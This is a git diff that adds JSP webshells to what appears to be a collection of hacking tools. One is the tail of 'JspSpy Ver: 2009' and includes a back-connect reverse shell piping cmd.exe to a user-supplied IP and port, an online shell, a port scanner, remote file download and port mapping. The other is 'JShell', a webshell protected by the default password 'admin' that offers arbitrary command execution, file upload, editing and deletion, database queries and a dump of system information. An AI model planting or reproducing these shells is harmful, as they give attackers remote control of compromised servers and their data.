request.getRemoteAddr(); +if (Util.isEmpty(port) || !Util.isInteger(port.toString())) +port = "4444"; +if (Util.isEmpty(program)) +program = "cmd.exe"; +if (!Util.isEmpty(done)) +Util.outMsg(out,done.toString()); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +""+ +"

    Back Connect >>

    "+ +"
    "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Your Ip :"+ +" "+ +" Your Port :"+ +" Program To Back :"+ +"

    "+ +" "+ +"
    "+ +"
    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BackConnectInvoker extends DefaultInvoker { +public boolean doAfter(){return false;} +public boolean doBefore(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String ip = request.getParameter("ip"); +String port = request.getParameter("port"); +String program = request.getParameter("program"); +if (Util.isEmpty(ip) || Util.isEmpty(program) || !Util.isInteger(port)) +return; +Socket socket = new Socket(ip,Integer.parseInt(port)); +Process process = Runtime.getRuntime().exec(program); +(new StreamConnector(process.getInputStream(), socket.getOutputStream())).start(); +(new StreamConnector(socket.getInputStream(), process.getOutputStream())).start(); +JSession.setAttribute("done","Back Connect Success!"); +JSession.setAttribute("ip",ip); +JSession.setAttribute("port",port); +JSession.setAttribute("program",program); +response.sendRedirect(SHELL_NAME+"?o=vbc"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class JspEnvInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""+ +" "+ +" "+ +" "+ +"

    System Properties >>

    "+ +"
    "+ +"
    "+ +"
      "); +Properties pro = System.getProperties(); +Enumeration names = pro.propertyNames(); +while (names.hasMoreElements()){ +String name = (String)names.nextElement(); +out.println("
    • "+Util.htmlEncode(name)+" : "+Util.htmlEncode(pro.getProperty(name))+"
      • "); +} +out.println("

    System Environment >>

      "); +Map envs = System.getenv(); +Set> entrySet = envs.entrySet(); +for (Map.Entry en:entrySet) { +out.println("
    • "+Util.htmlEncode(en.getKey())+" : "+Util.htmlEncode(en.getValue())+"
      • "); +} +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class TopInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    JspSpy Ver: 2009"+request.getHeader("host")+" ("+InetAddress.getLocalHost().getHostAddress()+")
    Logout | "+ +" File Manager | "+ +" DataBase Manager | "+ +" Execute Command | "+ +" Shell OnLine | "+ +" Back Connect | "+ +" Port Scan | "+ +" Download Remote File | "+ +" ClipBoard | "+ +" Remote Control | "+ +" Port Map | "+ +" JSP Env "+ +"
    "); +if (JSession.getAttribute(MSG) != null) { +Util.outMsg(out,JSession.getAttribute(MSG).toString()); +JSession.removeAttribute(MSG); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VOnLineShellInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +out.println(""+ +" "+ +" "+ +" "+ +"
    "); +out.println("

    Shell OnLine »


    "); +out.println("
    "+ +" "+ +" "+ +" Notice ! If You Are Using IE , You Must Input A Command First After You Start Or You Will Not See The Echo"+ +"
    "+ +"
    "+ +" "+ +"
    "+ +" "+ +" "+ +" "+ +" Auto Scroll"+ +" "+ +"
    "+ +" " +); +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class OnLineInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String type = request.getParameter("type"); +if (Util.isEmpty(type)) +return; +if (type.toLowerCase().equals("start")) { +String exe = request.getParameter("exe"); +if (Util.isEmpty(exe)) +return; +Process pro = Runtime.getRuntime().exec(exe); +ByteArrayOutputStream outs = new ByteArrayOutputStream(); +response.setContentLength(100000000); +response.setContentType("text/html;charset="+Charset.defaultCharset().name()); +OnLineProcess olp = new OnLineProcess(pro); +JSession.setAttribute(SHELL_ONLINE,olp); +new OnLineConnector(new ByteArrayInputStream(outs.toByteArray()),pro.getOutputStream(),"exeOclientR",olp).start(); +new OnLineConnector(pro.getInputStream(),response.getOutputStream(),"exeRclientO",olp).start(); +new OnLineConnector(pro.getErrorStream(),response.getOutputStream(),"exeRclientO",olp).start();//错误信息流?? +Thread.sleep(1000 * 60 * 60 * 24); +} else if (type.equals("ecmd")) { +Object o = JSession.getAttribute(SHELL_ONLINE); +String cmd = request.getParameter("cmd"); +if (Util.isEmpty(cmd)) +return; +if (o == null) +return; +OnLineProcess olp = (OnLineProcess)o; +olp.setCmd(cmd); +} else { +Object o = JSession.getAttribute(SHELL_ONLINE); +if (o == null) +return; +OnLineProcess olp = (OnLineProcess)o; +olp.stop(); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} + +static{ +ins.put("script",new ScriptInvoker()); +ins.put("before",new BeforeInvoker()); +ins.put("after",new AfterInvoker()); +ins.put("deleteBatch",new DeleteBatchInvoker()); +ins.put("clipboard",new ClipBoardInvoker()); +ins.put("vRemoteControl",new VRemoteControlInvoker()); +ins.put("gc",new GcInvoker()); +ins.put("vPortScan",new VPortScanInvoker()); +ins.put("portScan",new PortScanInvoker()); +ins.put("vConn",new VConnInvoker()); +ins.put("dbc",new DbcInvoker()); +ins.put("executesql",new ExecuteSQLInvoker()); +ins.put("vLogin",new VLoginInvoker()); +ins.put("login",new LoginInvoker()); +ins.put("filelist", new FileListInvoker()); +ins.put("logout",new LogoutInvoker()); +ins.put("upload",new UploadInvoker()); +ins.put("copy",new CopyInvoker()); +ins.put("bottom",new BottomInvoker()); +ins.put("vCreateFile",new VCreateFileInvoker()); +ins.put("vEdit",new VEditInvoker()); +ins.put("createFile",new CreateFileInvoker()); +ins.put("vEditProperty",new VEditPropertyInvoker()); +ins.put("editProperty",new EditPropertyInvoker()); +ins.put("vs",new VsInvoker()); +ins.put("shell",new ShellInvoker()); +ins.put("down",new DownInvoker()); +ins.put("vd",new VdInvoker()); +ins.put("downRemote",new DownRemoteInvoker()); +ins.put("index",new IndexInvoker()); +ins.put("mkdir",new MkDirInvoker()); +ins.put("move",new MoveInvoker()); +ins.put("removedir",new RemoteDirInvoker()); +ins.put("packBatch",new PackBatchInvoker()); +ins.put("pack",new PackInvoker()); +ins.put("unpack",new UnPackInvoker()); +ins.put("vmp",new VmpInvoker()); +ins.put("vbc",new VbcInvoker()); +ins.put("backConnect",new BackConnectInvoker()); +ins.put("jspEnv",new JspEnvInvoker()); +ins.put("smp",new SmpInvoker()); +ins.put("mapPort",new MapPortInvoker()); +ins.put("top",new TopInvoker()); +ins.put("vso",new VOnLineShellInvoker()); +ins.put("online",new OnLineInvoker()); +} +%> +<% +try { +String o = request.getParameter("o"); +if (!Util.isEmpty(o)) { +Invoker in = ins.get(o); +if (in == null) { +response.sendRedirect(SHELL_NAME+"?o=index"); +} else { +if (in.doBefore()) { +String path = request.getParameter("folder"); +if (!Util.isEmpty(path)) +session.setAttribute(CURRENT_DIR,path); +ins.get("before").invoke(request,response,session); +ins.get("script").invoke(request,response,session); +ins.get("top").invoke(request,response,session); +} +in.invoke(request,response,session); +if (!in.doAfter()) { +return; +}else{ +ins.get("bottom").invoke(request,response,session); +ins.get("after").invoke(request,response,session); +} +} +} else { +response.sendRedirect(SHELL_NAME+"?o=index"); +} +} catch (Exception e) { +ByteArrayOutputStream bout = new ByteArrayOutputStream(); +e.printStackTrace(new PrintStream(bout)); +session.setAttribute(CURRENT_DIR,SHELL_DIR); +Util.outMsg(out,Util.htmlEncode(new String(bout.toByteArray())).replace("\n","
    "),"left"); +bout.close(); +out.flush(); +ins.get("bottom").invoke(request,response,session); +ins.get("after").invoke(request,response,session); +} +%> \ No newline at end of file diff --git a/jsp/hackk8/fuck-jsp/ma4.jsp b/jsp/hackk8/fuck-jsp/ma4.jsp new file mode 100644 index 0000000..58daa09 --- /dev/null +++ b/jsp/hackk8/fuck-jsp/ma4.jsp @@ -0,0 +1,1780 @@ +<%@ page contentType="text/html; charset=GBK" %> +<%@ page import="java.io.*"%> +<%@ page import="java.util.Map"%> +<%@ page import="java.util.HashMap"%> +<%@ page import="java.nio.charset.Charset"%> +<%@ page import="java.util.regex.*"%> +<%@ page import="java.sql.*"%> + +<%! +//it's explame +private String _password = "admin"; +private String _encodeType = "GB2312"; +private int _sessionOutTime = 20; +private String[] _textFileTypes = {"txt", "htm", "html", "asp", "jsp", "java", "js", "css", "c", "cpp", "sh", "pl", "cgi", "php", "conf", "xml", "xsl", "ini", "vbs", "inc"}; +private Connection _dbConnection = null; +private Statement _dbStatement = null; +private String _url = null; +//it's explame +public boolean validate(String password) { + if (password.equals(_password)) { + return true; + } else { + return false; + } +} +//it's explame +public String HTMLEncode(String str) { + str = str.replaceAll(" ", " "); + str = str.replaceAll("<", "<"); + str = str.replaceAll(">", ">"); + str = str.replaceAll("\r\n", "
    "); + + return str; +} +//it's explame +public String Unicode2GB(String str) { + String sRet = null; + //it's explame + try { + sRet = new String(str.getBytes("ISO8859_1"), _encodeType); + } catch (Exception e) { + sRet = str; + } + + return sRet; +} +//it's explame +public String exeCmd(String cmd) { + Runtime runtime = Runtime.getRuntime(); + Process proc = null; + String retStr = ""; + InputStreamReader insReader = null; + char[] tmpBuffer = new char[1024]; + int nRet = 0; + //it's explame + try { + proc = runtime.exec(cmd); + insReader = new InputStreamReader(proc.getInputStream(), Charset.forName("GB2312")); + + while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) { + retStr += new String(tmpBuffer, 0, nRet); + } + //it's explame + insReader.close(); + retStr = HTMLEncode(retStr); + } catch (Exception e) { + retStr = "bad command \"" + cmd + "\""; + } finally { + return retStr; + } +} +//it's explame +public String pathConvert(String path) { + String sRet = path.replace('\\', '/'); + File file = new File(path); + //it's explame + if (file.getParent() != null) { + if (file.isDirectory()) { + if (! sRet.endsWith("/")) + sRet += "/"; + } + } else { + if (! sRet.endsWith("/")) + sRet += "/"; + } + //it's explame + return sRet; +} + +public String strCut(String str, int len) { + String sRet; + //it's explame + len -= 3; + + if (str.getBytes().length <= len) { + sRet = str; + } else { + try { + sRet = (new String(str.getBytes(), 0, len, "GBK")) + "..."; + } catch (Exception e) { + sRet = str; + } + } + + return sRet; +} +//it's explame +public String listFiles(String path, String curUri) { + File[] files = null; + File curFile = null; + String sRet = null; + int n = 0; + boolean isRoot = path.equals(""); + //it's explame + path = pathConvert(path); + + try { + if (isRoot) { + files = File.listRoots(); + } else { + try { + curFile = new File(path); + String[] sFiles = curFile.list(); + files = new File[sFiles.length]; + + for (n = 0; n < sFiles.length; n ++) { + files[n] = new File(path + sFiles[n]); + } + } catch (Exception e) { + sRet = "bad path \"" + path + "\""; + } + } + //it's explame + if (sRet == null) { + sRet = "\n"; + sRet += "\n"; + sRet += "\n"; + sRet += " \n"; + //it's explame + if (curFile != null) { + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + } + //it's explame + sRet += "\n"; + //it's explame + sRet += " \n"; + //it's explame + for (n = 0; n < files.length; n ++) { + sRet += " \n"; + //it's explame + if (! isRoot) { + sRet += " \n"; + if (files[n].isDirectory()) { + sRet += " \n"; + } else { + sRet += " \n"; + } + + sRet += " \n"; + sRet += " \n"; + } else { + sRet += " \n"; + } + + sRet += " \n"; + } + sRet += " \n"; + sRet += "
    \n"; + sRet += "  ϼĿ¼ "; + sRet += "Ŀ¼ "; + sRet += "½ļ "; + sRet += "ɾ "; + sRet += " "; + sRet += " "; + sRet += "ϴļ\n"; + sRet += " \n"; + sRet += "
    <" + strCut(files[n].getName(), 50) + ">" + strCut(files[n].getName(), 50) + "" + (files[n].isDirectory() ? "<dir>" : "") + ((! files[n].isDirectory()) && isTextFile(getExtName(files[n].getPath())) ? "<edit>" : "") + "" + files[n].length() + "" + pathConvert(files[n].getPath()) + "
    \n"; + } + } catch (SecurityException e) { + sRet = "security violation, no privilege."; + } + + return sRet; +} + +public boolean isTextFile(String extName) { + int i; + boolean bRet = false; + + if (! extName.equals("")) { + for (i = 0; i < _textFileTypes.length; i ++) { + if (extName.equals(_textFileTypes[i])) { + bRet = true; + break; + } + } + } else { + bRet = true; + } + + return bRet; +} + +public String getExtName(String fileName) { + String sRet = ""; + int nLastDotPos; + //it's explame + fileName = pathConvert(fileName); + //it's explame + nLastDotPos = fileName.lastIndexOf("."); + + if (nLastDotPos == -1) { + sRet = ""; + } else { + sRet = fileName.substring(nLastDotPos + 1); + } + + return sRet; +} + +public String browseFile(String path) { + String sRet = ""; + File file = null; + FileReader fileReader = null; + //it's explame + path = pathConvert(path); + //it's explame + try { + file = new File(path); + fileReader = new FileReader(file); + String fileString = ""; + char[] chBuffer = new char[1024]; + int ret; + + sRet = "\n"; + //it's explame + } catch (IOException e) { + sRet += "\n"; + } + + return sRet; +} +//it's explame +public String openFile(String path, String curUri) { + String sRet = ""; + boolean canOpen = false; + int nLastDotPos = path.lastIndexOf("."); + String extName = ""; + String fileString = null; + File curFile = null; + //it's explame + path = pathConvert(path); + //it's explame + if (nLastDotPos == -1) { + canOpen = true; + } else { + extName = path.substring(nLastDotPos + 1); + canOpen = isTextFile(extName); + } + + if (canOpen) { + try { + fileString = ""; + curFile = new File(path); + FileReader fileReader = new FileReader(curFile); + char[] chBuffer = new char[1024]; + int nRet; + + while ((nRet = fileReader.read(chBuffer, 0, 1024)) != -1) { + fileString += new String(chBuffer, 0, nRet); + } + //it's explame + fileReader.close(); + } catch (IOException e) { + fileString = null; + sRet = "ܴļ\"" + path + "\""; + } catch (SecurityException e) { + fileString = null; + sRet = "ȫ⣬ûȨִиò"; + } + } else { + sRet = "file \"" + path + "\" is not a text file, can't be opened in text mode"; + } + + if (fileString != null) { + sRet += "\n"; + sRet += "\n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += "
    [ϼĿ¼]
    \n"; + sRet += " \n"; + sRet += "
     
    \n"; + } + + return sRet; +} + +public String saveFile(String path, String curUri, String fileContent) { + String sRet = ""; + File file = null; + + path = pathConvert(path); + + try { + file = new File(path); + + if (! file.canWrite()) { + sRet = "ļд"; + } else { + FileWriter fileWriter = new FileWriter(file); + fileWriter.write(fileContent); + + fileWriter.close(); + sRet = "ļɹڷأԺ򡭡\n"; + sRet += "\n"; + } + } catch (IOException e) { + sRet = "ļʧ"; + } catch (SecurityException e) { + sRet = "ȫ⣬ûȨִиò"; + } + + return sRet; +} + +public String createFolder(String path, String curUri, String folderName) { + String sRet = ""; + File folder = null; + + path = pathConvert(path); + + try { + folder = new File(path + folderName); + + if (folder.exists() && folder.isDirectory()) { + sRet = "\"" + path + folderName + "\"Ŀ¼Ѿ"; + } else { + if (folder.mkdir()) { + sRet = "ɹĿ¼\"" + pathConvert(folder.getPath()) + "\"ڷأԺ򡭡\n"; + sRet += ""; + } else { + sRet = "Ŀ¼\"" + folderName + "\"ʧ"; + } + } + } catch (SecurityException e) { + sRet = "ȫ⣬ûȨִиò"; + } + + return sRet; +} + +public String createFile(String path, String curUri, String fileName) { + String sRet = ""; + File file = null; + + path = pathConvert(path); + + try { + file = new File(path + fileName); + + if (file.createNewFile()) { + sRet = ""; + } else { + sRet = "\"" + path + fileName + "\"ļѾ"; + } + } catch (SecurityException e) { + sRet = "ȫ⣬ûȨִиò"; + } catch (IOException e) { + sRet = "ļ\"" + path + fileName + "\"ʧ"; + } + + return sRet; +} + +public String deleteFile(String path, String curUri, String[] files2Delete) { + String sRet = ""; + File tmpFile = null; + + try { + for (int i = 0; i < files2Delete.length; i ++) { + tmpFile = new File(files2Delete[i]); + if (! tmpFile.delete()) { + sRet += "ɾ\"" + files2Delete[i] + "\"ʧ
    \n"; + } + } + + if (sRet.equals("")) { + sRet = "ɾɹڷأԺ򡭡\n"; + sRet += ""; + } + } catch (SecurityException e) { + sRet = "ȫ⣬ûȨִиò\n"; + } + + return sRet; +} + +public String saveAs(String path, String curUri, String fileContent) { + String sRet = ""; + File file = null; + FileWriter fileWriter = null; + + try { + file = new File(path); + + if (file.createNewFile()) { + fileWriter = new FileWriter(file); + fileWriter.write(fileContent); + fileWriter.close(); + + sRet = ""; + } else { + sRet = "ļ\"" + path + "\"Ѿ"; + } + } catch (IOException e) { + sRet = "ļ\"" + path + "\"ʧ"; + } + + return sRet; +} + + +public String uploadFile(ServletRequest request, String path, String curUri) { + String sRet = ""; + File file = null; + InputStream in = null; + + path = pathConvert(path); + + try { + in = request.getInputStream(); + + byte[] inBytes = new byte[request.getContentLength()]; + int nBytes; + int start = 0; + int end = 0; + int size = 1024; + String token = null; + String filePath = null; + + // + // һֽ + // + while ((nBytes = in.read(inBytes, start, size)) != -1) { + start += nBytes; + } + + in.close(); + // + // ֽеõļָ + // + int i = 0; + byte[] seperator; + + while (inBytes[i] != 13) { + i ++; + } + + seperator = new byte[i]; + + for (i = 0; i < seperator.length; i ++) { + seperator[i] = inBytes[i]; + } + + // + // õHeader + // + String dataHeader = null; + i += 3; + start = i; + while (! (inBytes[i] == 13 && inBytes[i + 2] == 13)) { + i ++; + } + end = i - 1; + dataHeader = new String(inBytes, start, end - start + 1); + + // + // õļ + // + token = "filename=\""; + start = dataHeader.indexOf(token) + token.length(); + token = "\""; + end = dataHeader.indexOf(token, start) - 1; + filePath = dataHeader.substring(start, end + 1); + filePath = pathConvert(filePath); + String fileName = filePath.substring(filePath.lastIndexOf("/") + 1); + + // + // õļݿʼλ + // + i += 4; + start = i; + + /* + boolean found = true; + byte[] tmp = new byte[seperator.length]; + while (i <= inBytes.length - 1 - seperator.length) { + + for (int j = i; j < i + seperator.length; j ++) { + if (seperator[j - i] != inBytes[j]) { + found = false; + break; + } else + tmp[j - i] = inBytes[j]; + } + + if (found) + break; + + i ++; + }*/ + + // + // ͵İ취 + // + end = inBytes.length - 1 - 2 - seperator.length - 2 - 2; + + // + // Ϊļ + // + File newFile = new File(path + fileName); + newFile.createNewFile(); + FileOutputStream out = new FileOutputStream(newFile); + + //out.write(inBytes, start, end - start + 1); + out.write(inBytes, start, end - start + 1); + out.close(); + + sRet = "\n"; + } catch (IOException e) { + sRet = "\n"; + } + + sRet += ""; + return sRet; +} + +public boolean fileCopy(String srcPath, String dstPath) { + boolean bRet = true; + + try { + FileInputStream in = new FileInputStream(new File(srcPath)); + FileOutputStream out = new FileOutputStream(new File(dstPath)); + byte[] buffer = new byte[1024]; + int nBytes; + + + while ((nBytes = in.read(buffer, 0, 1024)) != -1) { + out.write(buffer, 0, nBytes); + } + + in.close(); + out.close(); + } catch (IOException e) { + bRet = false; + } + + return bRet; +} + +public String getFileNameByPath(String path) { + String sRet = ""; + + path = pathConvert(path); + + if (path.lastIndexOf("/") != -1) { + sRet = path.substring(path.lastIndexOf("/") + 1); + } else { + sRet = path; + } + + return sRet; +} + +public String copyFiles(String path, String curUri, String[] files2Copy, String dstPath) { + String sRet = ""; + int i; + + path = pathConvert(path); + dstPath = pathConvert(dstPath); + + for (i = 0; i < files2Copy.length; i ++) { + if (! fileCopy(files2Copy[i], dstPath + getFileNameByPath(files2Copy[i]))) { + sRet += "ļ\"" + files2Copy[i] + "\"ʧ
    "; + } + } + + if (sRet.equals("")) { + sRet = "ļƳɹڷأԺ򡭡"; + sRet += ""; + } + + return sRet; +} + +public boolean isFileName(String fileName) { + boolean bRet = false; + + Pattern p = Pattern.compile("^[a-zA-Z0-9][\\w\\.]*[\\w]$"); + Matcher m = p.matcher(fileName); + + bRet = m.matches(); + + return bRet; +} + +public String renameFile(String path, String curUri, String file2Rename, String newName) { + String sRet = ""; + + path = pathConvert(path); + file2Rename = pathConvert(file2Rename); + + try { + File file = new File(file2Rename); + + newName = file2Rename.substring(0, file2Rename.lastIndexOf("/") + 1) + newName; + File newFile = new File(newName); + + if (! file.exists()) { + sRet = "ļ\"" + file2Rename + "\""; + } else { + file.renameTo(newFile); + sRet = "ļɹڷأԺ򡭡"; + sRet += ""; + } + } catch (SecurityException e) { + sRet = "ȫ⵼ļ\"" + file2Rename + "\"ʧ"; + } + + return sRet; +} + +public boolean DBInit(String dbType, String dbServer, String dbPort, String dbUsername, String dbPassword, String dbName) { + boolean bRet = true; + String driverName = ""; + + if (dbServer.equals("")) + dbServer = "localhost"; + + try { + if (dbType.equals("sqlserver")) { + driverName = "com.microsoft.jdbc.sqlserver.SQLServerDriver"; + if (dbPort.equals("")) + dbPort = "1433"; + _url = "jdbc:microsoft:sqlserver://" + dbServer + ":" + dbPort + ";User=" + dbUsername + ";Password=" + dbPassword + ";DatabaseName=" + dbName; + } else if (dbType.equals("mysql")) { + driverName = "com.mysql.jdbc.Driver"; + if (dbPort.equals("")) + dbPort = "3306"; + _url = "jdbc:mysql://" + dbServer + ":" + dbPort + ";User=" + dbUsername + ";Password=" + dbPassword + ";DatabaseName=" + dbName; + } else if (dbType.equals("odbc")) { + driverName = "sun.jdbc.odbc.JdbcOdbcDriver"; + _url = "jdbc:odbc:dsn=" + dbName + ";User=" + dbUsername + ";Password=" + dbPassword; + } else if (dbType.equals("oracle")) { + driverName = "oracle.jdbc.driver.OracleDriver"; + _url = "jdbc:oracle:thin@" + dbServer + ":" + dbPort + ":" + dbName; + } else if (dbType.equals("db2")) { + driverName = "com.ibm.db2.jdbc.app.DB2Driver"; + _url = "jdbc:db2://" + dbServer + ":" + dbPort + "/" + dbName; + } + + Class.forName(driverName); + } catch (ClassNotFoundException e) { + bRet = false; + } + + return bRet; +} + +public boolean DBConnect(String User, String Password) { + boolean bRet = false; + + if (_url != null) { + try { + _dbConnection = DriverManager.getConnection(_url, User, Password); + _dbStatement = _dbConnection.createStatement(); + bRet = true; + } catch (SQLException e) { + bRet = false; + } + } + + return bRet; +} + +public String DBExecute(String sql) { + String sRet = ""; + + if (_dbConnection == null || _dbStatement == null) { + sRet = "ݿû"; + } else { + try { + if (sql.toLowerCase().substring(0, 6).equals("select")) { + ResultSet rs = _dbStatement.executeQuery(sql); + ResultSetMetaData rsmd = rs.getMetaData(); + int colNum = rsmd.getColumnCount(); + int colType; + + sRet = "sqlִгɹؽ
    \n"; + sRet += "\n"; + sRet += " \n"; + for (int i = 1; i <= colNum; i ++) { + sRet += " \n"; + } + sRet += " \n"; + while (rs.next()) { + sRet += " \n"; + for (int i = 1; i <= colNum; i ++) { + colType = rsmd.getColumnType(i); + + sRet += " \n"; + } + sRet += " \n"; + } + sRet += "
    " + rsmd.getColumnName(i) + "(" + rsmd.getColumnTypeName(i) + ")
    "; + switch (colType) { + case Types.BIGINT: + sRet += rs.getLong(i); + break; + + case Types.BIT: + sRet += rs.getBoolean(i); + break; + + case Types.BOOLEAN: + sRet += rs.getBoolean(i); + break; + + case Types.CHAR: + sRet += rs.getString(i); + break; + + case Types.DATE: + sRet += rs.getDate(i).toString(); + break; + + case Types.DECIMAL: + sRet += rs.getDouble(i); + break; + + case Types.NUMERIC: + sRet += rs.getDouble(i); + break; + + case Types.REAL: + sRet += rs.getDouble(i); + break; + + case Types.DOUBLE: + sRet += rs.getDouble(i); + break; + + case Types.FLOAT: + sRet += rs.getFloat(i); + break; + + case Types.INTEGER: + sRet += rs.getInt(i); + break; + + case Types.TINYINT: + sRet += rs.getShort(i); + break; + + case Types.VARCHAR: + sRet += rs.getString(i); + break; + + case Types.TIME: + sRet += rs.getTime(i).toString(); + break; + + case Types.DATALINK: + sRet += rs.getTimestamp(i).toString(); + break; + } + sRet += "
    \n"; + + rs.close(); + } else { + if (_dbStatement.execute(sql)) { + sRet = "sqlִгɹ"; + } else { + sRet = "sqlִʧ"; + } + } + } catch (SQLException e) { + sRet = "sqlִʧ"; + } + } + + return sRet; +} + +public void DBRelease() { + try { + if (_dbStatement != null) { + _dbStatement.close(); + _dbStatement = null; + } + + if (_dbConnection != null) { + _dbConnection.close(); + _dbConnection = null; + } + } catch (SQLException e) { + + } +} + +///////////////////////////////////////////////////////////////////////////////////////////////////////////////// + +class JshellConfig { + private String _jshellContent = null; + private String _path = null; + + public JshellConfig(String path) throws JshellConfigException { + _path = path; + read(); + } + + private void read() throws JshellConfigException { + try { + FileReader jshell = new FileReader(new File(_path)); + char[] buffer = new char[1024]; + int nChars; + _jshellContent = ""; + + while ((nChars = jshell.read(buffer, 0, 1024)) != -1) { + _jshellContent += new String(buffer, 0, nChars); + } + + jshell.close(); + } catch (IOException e) { + throw new JshellConfigException("ļʧ"); + } + } + + public void save() throws JshellConfigException { + FileWriter jshell = null; + + try { + jshell = new FileWriter(new File(_path)); + char[] buffer = _jshellContent.toCharArray(); + int start = 0; + int size = 1024; + + for (start = 0; start < buffer.length - 1 - size; start += size) { + jshell.write(buffer, start, size); + } + + jshell.write(buffer, start, buffer.length - 1 - start); + } catch (IOException e) { + new JshellConfigException("дļʧ"); + } finally { + try { + jshell.close(); + } catch (IOException e) { + + } + } + } + + public void setPassword(String password) throws JshellConfigException { + Pattern p = Pattern.compile("\\w+"); + Matcher m = p.matcher(password); + + if (! m.matches()) { + throw new JshellConfigException("벻гĸ»ַ"); + } + + p = Pattern.compile("private\\sString\\s_password\\s=\\s\"" + _password + "\""); + m = p.matcher(_jshellContent); + if (! m.find()) { + throw new JshellConfigException("ѾǷ޸"); + } + + _jshellContent = m.replaceAll("private String _password = \"" + password + "\""); + + //return HTMLEncode(_jshellContent); + } + + public void setEncodeType(String encodeType) throws JshellConfigException { + Pattern p = Pattern.compile("[A-Za-z0-9]+"); + Matcher m = p.matcher(encodeType); + + if (! m.matches()) { + throw new JshellConfigException("ʽֻĸֵ"); + } + + p = Pattern.compile("private\\sString\\s_encodeType\\s=\\s\"" + _encodeType + "\""); + m = p.matcher(_jshellContent); + + if (! m.find()) { + throw new JshellConfigException("ѾǷ޸"); + } + + _jshellContent = m.replaceAll("private String _encodeType = \"" + encodeType + "\""); + //return HTMLEncode(_jshellContent); + } + + public void setSessionTime(String sessionTime) throws JshellConfigException { + Pattern p = Pattern.compile("\\d+"); + Matcher m = p.matcher(sessionTime); + + if (! m.matches()) { + throw new JshellConfigException("sessionʱʱֻ"); + } + + p = Pattern.compile("private\\sint\\s_sessionOutTime\\s=\\s" + _sessionOutTime); + m = p.matcher(_jshellContent); + + if (! m.find()) { + throw new JshellConfigException("ѾǷ޸"); + } + + _jshellContent = m.replaceAll("private int _sessionOutTime = " + sessionTime); + //return HTMLEncode(_jshellContent); + } + + public void setTextFileTypes(String[] textFileTypes) throws JshellConfigException { + Pattern p = Pattern.compile("\\w+"); + Matcher m = null; + int i; + String fileTypes = ""; + String tmpFileTypes = ""; + + for (i = 0; i < textFileTypes.length; i ++) { + m = p.matcher(textFileTypes[i]); + + if (! m.matches()) { + throw new JshellConfigException("չֻĸֺ»ߵ"); + } + + if (i != textFileTypes.length - 1) + fileTypes += "\"" + textFileTypes[i] + "\"" + ", "; + else + fileTypes += "\"" + textFileTypes[i] + "\""; + } + + for (i = 0; i < _textFileTypes.length; i ++) { + if (i != _textFileTypes.length - 1) + tmpFileTypes += "\"" + _textFileTypes[i] + "\"" + ", "; + else + tmpFileTypes += "\"" + _textFileTypes[i] + "\""; + } + + p = Pattern.compile(tmpFileTypes); + m = p.matcher(_jshellContent); + + if (! m.find()) { + throw new JshellConfigException("ļѾǷ޸"); + } + + _jshellContent = m.replaceAll(fileTypes); + + //return HTMLEncode(_jshellContent); + } + + public String getContent() { + return HTMLEncode(_jshellContent); + } +} + +class JshellConfigException extends Exception { + public JshellConfigException(String message) { + super(message); + } +} +%> + + +jshell ver 0.1 + + + + +<% +session.setMaxInactiveInterval(_sessionOutTime * 60); + +if (request.getParameter("password") == null && session.getAttribute("password") == null) { +// show the login form +//================================================================================================ +%> + + + + + + + + + + +
    JShell Ver 1.0
    : + + +
    +<% +//================================================================================================ +// end of the login form +} else { + String password = null; + + if (session.getAttribute("password") == null) { + password = (String)request.getParameter("password"); + + if (validate(password) == false) { + out.println("
  • !
    • "); + out.close(); + return; + } + + session.setAttribute("password", password); + } else { + password = (String)session.getAttribute("password"); + } + + String action = null; + + if (request.getParameter("action") == null) + action = "main"; + else + action = (String)request.getParameter("action"); + + if (action.equals("exit")) { + session.removeAttribute("password"); + response.sendRedirect(request.getRequestURI()); + out.close(); + return; + } + +// show the main menu +//==================================================================================== +%> + + + + + + + +
    + + +
    +<% +//===================================================================================== +// end of main menu + + if (action.equals("main")) { +// print the system info table +//======================================================================================= +%> + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    Ϣ
    <%=request.getServerName()%>
    ˿<%=request.getServerPort()%>
    ϵͳ<%=System.getProperty("os.name") + " " + System.getProperty("os.version") + " " + System.getProperty("os.arch")%>
    ǰû<%=System.getProperty("user.name")%>
    ǰûĿ¼<%=System.getProperty("user.home")%>
    ǰûĿ¼<%=System.getProperty("user.dir")%>
    ·<%=request.getRequestURI()%>
    ·<%=request.getRealPath(request.getServletPath())%>
    Э<%=request.getProtocol()%>
    汾Ϣ<%=application.getServerInfo()%>
    JDK汾<%=System.getProperty("java.version")%>
    JDKװ·<%=System.getProperty("java.home")%>
    JAVA汾<%=System.getProperty("java.vm.specification.version")%>
